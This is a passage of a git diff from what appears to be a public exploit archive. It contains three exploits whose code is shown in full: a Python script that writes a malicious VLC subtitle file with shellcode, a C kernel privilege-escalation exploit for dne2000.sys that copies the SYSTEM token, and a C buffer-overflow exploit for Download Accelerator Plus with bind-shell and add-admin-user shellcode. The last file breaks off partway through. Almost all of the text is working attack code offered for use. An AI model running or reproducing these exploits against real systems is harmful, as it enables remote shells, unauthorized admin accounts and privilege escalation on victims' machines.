+"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43\x31"
+"\x4a\x4b\x50\x49\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x50"
+"\x31\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x43\x37"
+"\x49\x51\x49\x5a\x44\x4d\x45\x51\x49\x52\x4a\x4b\x4b\x44\x47"
+"\x4b\x51\x44\x47\x54\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
+"\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c"
+"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x43\x33\x46\x4c\x4c\x4b"
+"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x45\x31\x48\x43\x50\x31\x49"
+"\x4b\x45\x34\x4c\x4b\x50\x43\x50\x30\x4c\x4b\x47\x30\x44\x4c"
+"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
+"\x4e\x43\x58\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
+"\x4e\x36\x45\x36\x50\x53\x45\x36\x42\x48\x46\x53\x50\x32\x42"
+"\x48\x42\x57\x42\x53\x46\x52\x51\x4f\x51\x44\x4b\x4f\x4e\x30"
+"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x4e"
+"\x36\x51\x4f\x4b\x39\x4b\x55\x42\x46\x4b\x31\x4a\x4d\x43\x38"
+"\x45\x52\x46\x35\x43\x5a\x43\x32\x4b\x4f\x4e\x30\x45\x38\x4e"
+"\x39\x44\x49\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48\x56\x50\x53"
+"\x51\x43\x46\x33\x46\x33\x51\x43\x47\x33\x51\x43\x47\x33\x51"
+"\x43\x4b\x4f\x4e\x30\x43\x56\x43\x58\x44\x51\x51\x4c\x45\x36"
+"\x46\x33\x4d\x59\x4b\x51\x4a\x35\x42\x48\x4e\x44\x45\x4a\x42"
+"\x50\x49\x57\x46\x37\x4b\x4f\x4e\x36\x43\x5a\x44\x50\x50\x51"
+"\x50\x55\x4b\x4f\x48\x50\x42\x48\x49\x34\x4e\x4d\x46\x4e\x4b"
+"\x59\x46\x37\x4b\x4f\x48\x56\x51\x43\x46\x35\x4b\x4f\x48\x50"
+"\x45\x38\x4b\x55\x51\x59\x4d\x56\x47\x39\x51\x47\x4b\x4f\x48"
+"\x56\x46\x30\x46\x34\x46\x34\x51\x45\x4b\x4f\x4e\x30\x4a\x33"
+"\x45\x38\x4d\x37\x43\x49\x48\x46\x43\x49\x51\x47\x4b\x4f\x4e"
+"\x36\x51\x45\x4b\x4f\x48\x50\x43\x56\x43\x5a\x43\x54\x43\x56"
+"\x43\x58\x42\x43\x42\x4d\x4b\x39\x4b\x55\x42\x4a\x50\x50\x46"
+"\x39\x46\x49\x48\x4c\x4b\x39\x4d\x37\x42\x4a\x47\x34\x4d\x59"
+"\x4b\x52\x50\x31\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x51\x52\x46"
+"\x4d\x4b\x4e\x47\x32\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x47\x48"
+"\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38\x43\x42\x4b\x4e\x4e\x53\x44"
+"\x56\x4b\x4f\x44\x35\x47\x34\x4b\x4f\x49\x46\x51\x4b\x50\x57"
+"\x46\x32\x50\x51\x46\x31\x50\x51\x43\x5a\x45\x51\x46\x31\x46"
+"\x31\x46\x35\x46\x31\x4b\x4f\x48\x50\x45\x38\x4e\x4d\x48\x59"
+"\x44\x45\x48\x4e\x51\x43\x4b\x4f\x49\x46\x43\x5a\x4b\x4f\x4b"
+"\x4f\x50\x37\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
+"\x48\x44\x42\x44\x4b\x4f\x49\x46\x50\x52\x4b\x4f\x4e\x30\x42"
+"\x48\x4a\x4f\x48\x4e\x4d\x30\x45\x30\x46\x33\x4b\x4f\x49\x46"
+"\x4b\x4f\x4e\x30\x44\x4a\x41\x41" )
+
+OFFSET1 = 'A'*152242
+NOP1 = '\x90'*16
+OFFSET2 = 'B'*10901
+JMPESP = '\x59\x65\xFE\x62' # 0x62FE6559 jmp ESP libvlc.dll
+OFFSET3 = 'C'*674
+SEH = '\x66\x14\x40' # POP POP RET in vlc.exe
+JMPBACK = '\xE9\x2E\xCD\xFF\xFF' # ^E9 2ECDFFFF JMP 0250CCD2
+JMPS = '\xEB\xF9\x90\x90'
+EVIL = OFFSET1 + NOP1 + SHELLCODE1 + OFFSET2 + JMPESP + SHELLCODE1 + OFFSET3 + JMPBACK + JMPS + SEH
+
+fileHandle = open('film1.ssa', 'w' )
+fileHandle.write('[Script Info]\n')
+fileHandle.write('ScriptType: v4.00\n')
+fileHandle.write('Title: VLC 0.8.6d buffer-overflow\n')
+fileHandle.write('Collisions: Normal\n\n')
+fileHandle.write('[V4 Styles]\n\n')
+fileHandle.write('[Events]\n')
+fileHandle.write('Dialogue: '+ EVIL)
+fileHandle.close()
+
+# milw0rm.com [2008-05-23]
diff --git a/platforms/windows/local/5837.c b/platforms/windows/local/5837.c
index d3d882a7a..742b527ec 100755
--- a/platforms/windows/local/5837.c
+++ b/platforms/windows/local/5837.c
@@ -1,256 +1,256 @@ -/* dne2000-call.c - * - * Copyright (c) 2008 by - * - * Deterministic Network Enhancer (dne2000.sys) local kernel ring0 SYSTEM exploit - * by mu-b - Sun 06 Jan 2008 - * - * - Tested on: dne2000.sys 2.21.7.233 <-> 3.21.7.17464 - * bundled with: SafeNET HighAssurance Remote, SoftRemote - * Cisco VPN Client - * Winproxy - * - * Compile: MinGW + -lntdll - * - * - Private Source Code -DO NOT DISTRIBUTE - - * http://www.digit-labs.org/ -- Digit-Labs 2008!@$! - */ - -#include -#include - -#include -#include - -#define DNE_IOCTL 0x00222008 -#define DNE_FLAG 0x00001005 - -#define ITEM_FLAG_1 0x4A424F4E -#define ITEM_FLAG_2 0x47554C50 -#define FUNC_FLAG 0x00010003 - -static unsigned char win32_fixup[] = - "\x56"; - -static unsigned char win2k3_ring0_shell[] = - /* _ring0 */ - "\xb8\x24\xf1\xdf\xff" - "\x8b\x00" - "\x8b\xb0\x18\x02\x00\x00" - "\x89\xf0" - /* _sys_eprocess_loop */ - "\x8b\x98\x94\x00\x00\x00" - "\x81\xfb\x04\x00\x00\x00" - "\x74\x11" - "\x8b\x80\x9c\x00\x00\x00" - "\x2d\x98\x00\x00\x00" - "\x39\xf0" - "\x75\xe3" - "\xeb\x21" - /* _sys_eprocess_found */ - "\x89\xc1" - "\x89\xf0" - - /* _cmd_eprocess_loop */ - "\x8b\x98\x94\x00\x00\x00" - "\x81\xfb\x00\x00\x00\x00" - "\x74\x10" - "\x8b\x80\x9c\x00\x00\x00" - "\x2d\x98\x00\x00\x00" - "\x39\xf0" - "\x75\xe3" - /* _not_found */ - "\xcc" - /* _cmd_eprocess_found - * _ring0_end */ - - /* copy tokens!$%! 
*/ - "\x8b\x89\xd8\x00\x00\x00" - "\x89\x88\xd8\x00\x00\x00" - "\x90"; - -static unsigned char winxp_ring0_shell[] = - /* _ring0 */ - "\xb8\x24\xf1\xdf\xff" - "\x8b\x00" - "\x8b\x70\x44" - "\x89\xf0" - /* _sys_eprocess_loop */ - "\x8b\x98\x84\x00\x00\x00" - "\x81\xfb\x04\x00\x00\x00" - "\x74\x11" - "\x8b\x80\x8c\x00\x00\x00" - "\x2d\x88\x00\x00\x00" - "\x39\xf0" - "\x75\xe3" - "\xeb\x21" - /* _sys_eprocess_found */ - "\x89\xc1" - "\x89\xf0" - - /* _cmd_eprocess_loop */ - "\x8b\x98\x84\x00\x00\x00" - "\x81\xfb\x00\x00\x00\x00" - "\x74\x10" - "\x8b\x80\x8c\x00\x00\x00" - "\x2d\x88\x00\x00\x00" - "\x39\xf0" - "\x75\xe3" - /* _not_found */ - "\xcc" - /* _cmd_eprocess_found - * _ring0_end */ - - /* copy tokens!$%! */ - "\x8b\x89\xc8\x00\x00\x00" - "\x89\x88\xc8\x00\x00\x00" - "\x90"; - -static unsigned char win32_ret[] = - "\x5e" - "\xc2\x10\x00"; - -struct ioctl_func { - char _pad[0x04]; - int flag; - char __pad[0x2C]; - void *func_ptr; -}; - -struct ioctl_item { - int flag; - char _pad[0x24]; - struct ioctl_func *item_func; - struct ioctl_item *item_ptr; -}; - -struct ioctl_req { - int req_num; - struct ioctl_item *ptr[2]; -}; - -static PCHAR -fixup_ring0_shell (DWORD ppid, DWORD *zlen) -{ - DWORD dwVersion, dwMajorVersion, dwMinorVersion; - - dwVersion = GetVersion (); - dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion))); - dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion))); - - if (dwMajorVersion != 5) - { - fprintf (stderr, "* GetVersion, unsupported version\n"); - exit (EXIT_FAILURE); - } - - switch (dwMinorVersion) - { - case 1: - *zlen = sizeof winxp_ring0_shell - 1; - *(PDWORD) &winxp_ring0_shell[55] = ppid; - return (winxp_ring0_shell); - - case 2: - *zlen = sizeof win2k3_ring0_shell - 1; - *(PDWORD) &win2k3_ring0_shell[58] = ppid; - return (win2k3_ring0_shell); - - default: - fprintf (stderr, "* GetVersion, unsupported version\n"); - exit (EXIT_FAILURE); - } - - return (NULL); -} - -int -main (int argc, char **argv) -{ - struct ioctl_req req; - struct 
ioctl_item items[2]; - struct ioctl_func funcs; - LPVOID zpage, zbuf; - DWORD rlen, zlen, ppid; - HANDLE hFile; - BOOL result; - - printf ("Deterministic Network Enhancer (dne2000.sys) local kernel ring0 SYSTEM exploit\n" - "by: \n" - "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); - - if (argc <= 1) - { - fprintf (stderr, "Usage: %s \n", argv[0]); - exit (EXIT_SUCCESS); - } - - ppid = atoi (argv[1]); - - hFile = CreateFileA ("\\\\.\\DNE", FILE_EXECUTE, - FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, - OPEN_EXISTING, 0, NULL); - if (hFile == INVALID_HANDLE_VALUE) - { - fprintf (stderr, "* CreateFileA failed, %d\n", hFile); - exit (EXIT_FAILURE); - } - - zpage = VirtualAlloc (NULL, 0x10000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE); - if (zpage == NULL) - { - fprintf (stderr, "* VirtualAlloc failed\n"); - exit (EXIT_FAILURE); - } - printf ("* allocated page: 0x%08X [%d-bytes]\n", - zpage, 0x10000); - - memset (zpage, 0xCC, 0x10000); - zbuf = fixup_ring0_shell (ppid, &zlen); - memcpy (zpage, win32_fixup, sizeof (win32_fixup) - 1); - memcpy (zpage + sizeof (win32_fixup) - 1, zbuf, zlen); - memcpy (zpage + sizeof (win32_fixup) + zlen - 1, - win32_ret, sizeof (win32_ret) - 1); - - memset (&req, 0, sizeof req); - req.req_num = DNE_FLAG; - req.ptr[0] = NULL; - req.ptr[1] = &items[0]; - - memset (items, 0, sizeof items); - items[0].flag = ITEM_FLAG_1; - items[0].item_ptr = &items[1]; - - items[1].flag = ITEM_FLAG_2; - items[1].item_func = &funcs; - - memset (&funcs, 0, sizeof funcs); - funcs.flag = FUNC_FLAG; - funcs.func_ptr = zpage; - - printf ("* req.ptr: 0x%08X\n", &items[0]); - printf ("* @0x%08X: flag: 0x%08X, item_ptr: 0x%08X\n", - &items[0], items[0].flag, items[0].item_ptr); - printf ("* @0x%08X: flag: 0x%08X, item_func: 0x%08X\n", - items[0].item_ptr, items[1].flag, items[1].item_func); - printf ("* @0x%08X: flag: 0x%08X, func_ptr: 0x%08X\n", - items[1].item_func, funcs.flag, funcs.func_ptr); - - /* jump to our address :) */ - printf ("* jumping.. 
"); - result = DeviceIoControl (hFile, DNE_IOCTL, - &req, sizeof req, &req, sizeof req, &rlen, 0); - if (!result) - { - fprintf (stderr, "* DeviceIoControl failed\n"); - exit (EXIT_FAILURE); - } - printf ("done\n\n" - "* hmmm, you didn't STOP the box?!?!\n"); - - CloseHandle (hFile); - - return (EXIT_SUCCESS); -} - -// milw0rm.com [2008-06-17] +/* dne2000-call.c + * + * Copyright (c) 2008 by + * + * Deterministic Network Enhancer (dne2000.sys) local kernel ring0 SYSTEM exploit + * by mu-b - Sun 06 Jan 2008 + * + * - Tested on: dne2000.sys 2.21.7.233 <-> 3.21.7.17464 + * bundled with: SafeNET HighAssurance Remote, SoftRemote + * Cisco VPN Client + * Winproxy + * + * Compile: MinGW + -lntdll + * + * - Private Source Code -DO NOT DISTRIBUTE - + * http://www.digit-labs.org/ -- Digit-Labs 2008!@$! + */ + +#include +#include + +#include +#include + +#define DNE_IOCTL 0x00222008 +#define DNE_FLAG 0x00001005 + +#define ITEM_FLAG_1 0x4A424F4E +#define ITEM_FLAG_2 0x47554C50 +#define FUNC_FLAG 0x00010003 + +static unsigned char win32_fixup[] = + "\x56"; + +static unsigned char win2k3_ring0_shell[] = + /* _ring0 */ + "\xb8\x24\xf1\xdf\xff" + "\x8b\x00" + "\x8b\xb0\x18\x02\x00\x00" + "\x89\xf0" + /* _sys_eprocess_loop */ + "\x8b\x98\x94\x00\x00\x00" + "\x81\xfb\x04\x00\x00\x00" + "\x74\x11" + "\x8b\x80\x9c\x00\x00\x00" + "\x2d\x98\x00\x00\x00" + "\x39\xf0" + "\x75\xe3" + "\xeb\x21" + /* _sys_eprocess_found */ + "\x89\xc1" + "\x89\xf0" + + /* _cmd_eprocess_loop */ + "\x8b\x98\x94\x00\x00\x00" + "\x81\xfb\x00\x00\x00\x00" + "\x74\x10" + "\x8b\x80\x9c\x00\x00\x00" + "\x2d\x98\x00\x00\x00" + "\x39\xf0" + "\x75\xe3" + /* _not_found */ + "\xcc" + /* _cmd_eprocess_found + * _ring0_end */ + + /* copy tokens!$%! 
*/ + "\x8b\x89\xd8\x00\x00\x00" + "\x89\x88\xd8\x00\x00\x00" + "\x90"; + +static unsigned char winxp_ring0_shell[] = + /* _ring0 */ + "\xb8\x24\xf1\xdf\xff" + "\x8b\x00" + "\x8b\x70\x44" + "\x89\xf0" + /* _sys_eprocess_loop */ + "\x8b\x98\x84\x00\x00\x00" + "\x81\xfb\x04\x00\x00\x00" + "\x74\x11" + "\x8b\x80\x8c\x00\x00\x00" + "\x2d\x88\x00\x00\x00" + "\x39\xf0" + "\x75\xe3" + "\xeb\x21" + /* _sys_eprocess_found */ + "\x89\xc1" + "\x89\xf0" + + /* _cmd_eprocess_loop */ + "\x8b\x98\x84\x00\x00\x00" + "\x81\xfb\x00\x00\x00\x00" + "\x74\x10" + "\x8b\x80\x8c\x00\x00\x00" + "\x2d\x88\x00\x00\x00" + "\x39\xf0" + "\x75\xe3" + /* _not_found */ + "\xcc" + /* _cmd_eprocess_found + * _ring0_end */ + + /* copy tokens!$%! */ + "\x8b\x89\xc8\x00\x00\x00" + "\x89\x88\xc8\x00\x00\x00" + "\x90"; + +static unsigned char win32_ret[] = + "\x5e" + "\xc2\x10\x00"; + +struct ioctl_func { + char _pad[0x04]; + int flag; + char __pad[0x2C]; + void *func_ptr; +}; + +struct ioctl_item { + int flag; + char _pad[0x24]; + struct ioctl_func *item_func; + struct ioctl_item *item_ptr; +}; + +struct ioctl_req { + int req_num; + struct ioctl_item *ptr[2]; +}; + +static PCHAR +fixup_ring0_shell (DWORD ppid, DWORD *zlen) +{ + DWORD dwVersion, dwMajorVersion, dwMinorVersion; + + dwVersion = GetVersion (); + dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion))); + dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion))); + + if (dwMajorVersion != 5) + { + fprintf (stderr, "* GetVersion, unsupported version\n"); + exit (EXIT_FAILURE); + } + + switch (dwMinorVersion) + { + case 1: + *zlen = sizeof winxp_ring0_shell - 1; + *(PDWORD) &winxp_ring0_shell[55] = ppid; + return (winxp_ring0_shell); + + case 2: + *zlen = sizeof win2k3_ring0_shell - 1; + *(PDWORD) &win2k3_ring0_shell[58] = ppid; + return (win2k3_ring0_shell); + + default: + fprintf (stderr, "* GetVersion, unsupported version\n"); + exit (EXIT_FAILURE); + } + + return (NULL); +} + +int +main (int argc, char **argv) +{ + struct ioctl_req req; + struct 
ioctl_item items[2]; + struct ioctl_func funcs; + LPVOID zpage, zbuf; + DWORD rlen, zlen, ppid; + HANDLE hFile; + BOOL result; + + printf ("Deterministic Network Enhancer (dne2000.sys) local kernel ring0 SYSTEM exploit\n" + "by: \n" + "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); + + if (argc <= 1) + { + fprintf (stderr, "Usage: %s \n", argv[0]); + exit (EXIT_SUCCESS); + } + + ppid = atoi (argv[1]); + + hFile = CreateFileA ("\\\\.\\DNE", FILE_EXECUTE, + FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, + OPEN_EXISTING, 0, NULL); + if (hFile == INVALID_HANDLE_VALUE) + { + fprintf (stderr, "* CreateFileA failed, %d\n", hFile); + exit (EXIT_FAILURE); + } + + zpage = VirtualAlloc (NULL, 0x10000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE); + if (zpage == NULL) + { + fprintf (stderr, "* VirtualAlloc failed\n"); + exit (EXIT_FAILURE); + } + printf ("* allocated page: 0x%08X [%d-bytes]\n", + zpage, 0x10000); + + memset (zpage, 0xCC, 0x10000); + zbuf = fixup_ring0_shell (ppid, &zlen); + memcpy (zpage, win32_fixup, sizeof (win32_fixup) - 1); + memcpy (zpage + sizeof (win32_fixup) - 1, zbuf, zlen); + memcpy (zpage + sizeof (win32_fixup) + zlen - 1, + win32_ret, sizeof (win32_ret) - 1); + + memset (&req, 0, sizeof req); + req.req_num = DNE_FLAG; + req.ptr[0] = NULL; + req.ptr[1] = &items[0]; + + memset (items, 0, sizeof items); + items[0].flag = ITEM_FLAG_1; + items[0].item_ptr = &items[1]; + + items[1].flag = ITEM_FLAG_2; + items[1].item_func = &funcs; + + memset (&funcs, 0, sizeof funcs); + funcs.flag = FUNC_FLAG; + funcs.func_ptr = zpage; + + printf ("* req.ptr: 0x%08X\n", &items[0]); + printf ("* @0x%08X: flag: 0x%08X, item_ptr: 0x%08X\n", + &items[0], items[0].flag, items[0].item_ptr); + printf ("* @0x%08X: flag: 0x%08X, item_func: 0x%08X\n", + items[0].item_ptr, items[1].flag, items[1].item_func); + printf ("* @0x%08X: flag: 0x%08X, func_ptr: 0x%08X\n", + items[1].item_func, funcs.flag, funcs.func_ptr); + + /* jump to our address :) */ + printf ("* jumping.. 
"); + result = DeviceIoControl (hFile, DNE_IOCTL, + &req, sizeof req, &req, sizeof req, &rlen, 0); + if (!result) + { + fprintf (stderr, "* DeviceIoControl failed\n"); + exit (EXIT_FAILURE); + } + printf ("done\n\n" + "* hmmm, you didn't STOP the box?!?!\n"); + + CloseHandle (hFile); + + return (EXIT_SUCCESS); +} + +// milw0rm.com [2008-06-17] diff --git a/platforms/windows/local/6039.c b/platforms/windows/local/6039.c index 18e856016..d211ca78f 100755 --- a/platforms/windows/local/6039.c +++ b/platforms/windows/local/6039.c 
@@ -1,150 +1,150 @@ -#include -#include -/* -DAP 8.x (.m3u) File BOF C Exploit for XP SP2,SP3 English - -SecurityFocus Advisory: -Download Accelerator Plus (DAP) is prone to a buffer-overflow vulnerability -because it fails to perform adequate boundary checks on user-supplied input. -Successfully exploiting this issue may allow remote attackers to execute -arbitrary code in the context of the application.Failed exploit attempts -will cause denial-of-service conditions. - -Vulnerability discoverd by Krystian Kloskowski (h07) -Original POC by h07 http://www.milw0rm.com/exploits/6030 - -This poc will create a "special" .m3u file that when imported in DAP and then checked with -the verifiy button will cause a buffer overflow and lead to exploitation.Run the program -with no args for usage info or just look in the code. :P - -Tested on Windows XP English sp2&sp3. - -C Exploit code by Shinnok raydenxy [at] yahoo dot com -/* - -/* win32_bind - EXITFUNC=seh LPORT=1337 Size=709 Encoder=PexAlphaNum http://metasploit.com */ -unsigned char bind_scode[] = -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e" -"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x58" -"\x4e\x36\x46\x32\x46\x52\x4b\x48\x45\x34\x4e\x43\x4b\x48\x4e\x57" -"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x51\x4b\x48" -"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x33\x4b\x38" -"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c" -"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x33\x46\x45\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x58" -"\x4f\x55\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x38\x4e\x30\x4b\x44" 
-"\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x52\x4b\x48" -"\x49\x38\x4e\x36\x46\x32\x4e\x51\x41\x36\x43\x4c\x41\x33\x4b\x4d" -"\x46\x36\x4b\x38\x43\x54\x42\x53\x4b\x38\x42\x34\x4e\x50\x4b\x58" -"\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x34\x4a\x50\x50\x55\x4a\x36" -"\x50\x58\x50\x34\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x56" -"\x43\x55\x48\x56\x4a\x36\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x47" -"\x44\x53\x4f\x55\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e" -"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x55\x49\x48\x45\x4e" -"\x48\x56\x41\x48\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x50" -"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55" -"\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x35\x43\x55\x43\x44" -"\x43\x45\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x56\x4a\x36\x45\x50" -"\x49\x43\x48\x56\x43\x45\x49\x58\x41\x4e\x45\x49\x4a\x56\x46\x4a" -"\x4c\x31\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x31" -"\x41\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" -"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x45\x45\x45\x4f\x4f\x42\x4d" -"\x4a\x36\x45\x4e\x49\x34\x48\x48\x49\x44\x47\x55\x4f\x4f\x48\x4d" -"\x42\x55\x46\x55\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56" -"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45" -"\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x46\x48\x56\x4a\x46\x43\x46" -"\x4d\x46\x49\x38\x45\x4e\x4c\x36\x42\x35\x49\x55\x49\x42\x4e\x4c" -"\x49\x58\x47\x4e\x4c\x46\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c" -"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x34\x4e\x42" -"\x43\x59\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56" -"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x46\x44\x4f\x4f" -"\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x35\x41\x55\x41\x35\x4c\x46" -"\x41\x50\x41\x35\x41\x45\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x36" -"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46" -"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f" 
-"\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" -"\x4a\x56\x42\x4f\x4c\x58\x46\x30\x4f\x55\x43\x35\x4f\x4f\x48\x4d" -"\x4f\x4f\x42\x4d\x5a"; - -/* win32_adduser - PASS=test EXITFUNC=seh USER=test Size=489 Encoder=PexAlphaNum http://metasploit.com */ -unsigned char user_scode[] = -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" -"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x33\x4b\x58\x4e\x57" -"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x58" -"\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48" -"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c" -"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48" -"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x50\x4b\x54" -"\x4b\x58\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58" -"\x41\x30\x4b\x4e\x49\x48\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43" -"\x42\x4c\x46\x46\x4b\x58\x42\x34\x42\x43\x45\x38\x42\x4c\x4a\x47" -"\x4e\x30\x4b\x58\x42\x44\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a" -"\x4b\x48\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b" -"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43" -"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47" -"\x42\x45\x4a\x36\x42\x4f\x4c\x58\x46\x30\x4f\x45\x4a\x36\x4a\x39" -"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x56\x4d\x46" -"\x46\x46\x50\x42\x45\x56\x4a\x47\x45\x46\x42\x52\x4f\x52\x43\x36" -"\x42\x32\x50\x46\x45\x46\x46\x57\x42\x52\x45\x47\x43\x37\x45\x36" -"\x44\x37\x42\x32\x46\x37\x45\x36\x43\x47\x46\x37\x42\x42\x46\x37" -"\x45\x36\x43\x37\x46\x37\x42\x52\x4f\x52\x41\x44\x46\x54\x46\x44" 
-"\x42\x52\x48\x42\x48\x32\x42\x32\x50\x36\x45\x56\x46\x57\x42\x42" -"\x4e\x36\x4f\x36\x43\x56\x41\x36\x4e\x56\x47\x46\x44\x37\x4f\x36" -"\x45\x37\x42\x37\x42\x42\x41\x34\x46\x46\x4d\x56\x49\x56\x50\x46" -"\x49\x56\x43\x57\x46\x37\x44\x37\x41\x56\x46\x47\x4f\x56\x44\x37" -"\x43\x57\x42\x52\x46\x47\x45\x56\x43\x37\x46\x47\x42\x32\x4f\x52" -"\x41\x34\x46\x34\x46\x34\x42\x30\x5a"; - - - -unsigned char ra_sp2[] = "\xcf\xbc\x08\x76"; //msvcp60.dll -unsigned char ra_sp3[] = "\xe1\xbc\x08\x76"; //msvcp60.dll - -unsigned char nops1[14115]; //14115 * \x90 -unsigned char nops2[30]; //30 * \x90 - -int main(int argc, char **argv) -{ - int i; - FILE* f; - char* ra=NULL; - char* scode=NULL; - printf("[+] Download Accelerator Plus - DAP 8.x (.m3u) File Buffer Overflow Vulnerability\n"); - printf("[+] Discovered by Krystian Kloskowski (h07) \n"); - printf("[+] Code by Shinnok raydenxy[at]yahoo dot com\n"); - if ((argc!=3)||((atoi(argv[1])!=0)&&(atoi(argv[1])!=1))||((atoi(argv[2])!=0)&&(atoi(argv[2])!=1))){ - printf("Usage: %s target payload\n",argv[0]); - printf("Where target is:\n"); - printf("0: WinXP SP2\n"); - printf("1: WinXP SP3\n"); - printf("Where payload is:\n"); - printf("0: bind shell on 1337\n"); - printf("1: add admin user \"test\" with password \"test\"\n"); - return EXIT_SUCCESS; - } - for(i=0;i<14115;i++) nops1[i]='\x90'; - nops1[14115]='\0'; - for(i=0;i<30;i++) nops2[i]='\x90'; - 